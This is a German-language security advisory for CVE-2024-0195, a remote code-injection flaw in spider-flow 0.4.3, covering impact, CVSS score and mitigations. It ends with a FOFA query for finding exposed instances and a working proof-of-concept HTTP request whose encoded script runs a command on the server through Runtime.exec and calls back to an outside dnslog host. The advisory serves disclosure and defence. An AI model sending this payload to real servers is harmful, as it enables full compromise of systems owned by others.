
CVE-2024-0195 Unzureichende Kontrolle der Codegenerierung ('Code Injection')
CVE-2024-0195 ist eine kritische Code-Injection-Schwachstelle in der Webanwendung spider-flow 0.4.3, speziell in der Funktion FunctionService.saveFunction der Datei FunctionController.java. Ein Angreifer kann aus der Ferne bösartigen Code einschleusen, der auf dem Server ausgeführt wird. Dies ermöglicht eine vollständige Kompromittierung der Anwendung.
Diese Schwachstelle ist äußerst schwerwiegend, da sie eine Remote-Codeausführung auf dem Server ermöglicht, der die verwundbare spider-flow-Anwendung hostet. Ein Angreifer könnte den Server vollständig kompromittieren, sensible Daten stehlen, Schadsoftware oder Krypto-Miner installieren und ihn für weitere Angriffe innerhalb des Netzwerks nutzen. Vertraulichkeit, Integrität und Verfügbarkeit der Anwendung und des Servers werden alle kritisch beeinträchtigt.
Eine gepatchte Version wird nicht ausdrücklich erwähnt, sodass ein Patch derzeit keine Option zu sein scheint. Die Schwachstelle wurde öffentlich bekannt gegeben und Exploits sind verfügbar, daher sind sofortige Gegenmaßnahmen entscheidend.
Bis ein offizieller Patch veröffentlicht wird, sollte spider-flow 0.4.3 sofort offline genommen oder der Zugriff nur auf vertrauenswürdige Netzwerke/Benutzer beschränkt werden. Web Application Firewalls oder andere Kontrollen zur Eingabevalidierung könnten möglicherweise so konfiguriert werden, dass sie versuchte Code-Injection-Angriffe erkennen und als vorläufige Gegenmaßnahme blockieren. Dies sind jedoch keine vollständigen Lösungen, und die verwundbare Version sollte aktualisiert werden, sobald eine korrigierte Version verfügbar ist.
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
FOFA : app="spiderflow"
✔ Proof of concept
POST /function/save HTTP/1.1
Host: 192.168.116.128:8080
X-Requested-With: XMLHttpRequest
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Content-Length: 139
id=&name=test¶meter=test&script=return+java.lang.%2F****%2FRuntime%7D%3Br%3Dtest()%3Br.getRuntime().exec('ping+18k2tu.dnslog.cn')%3B%7B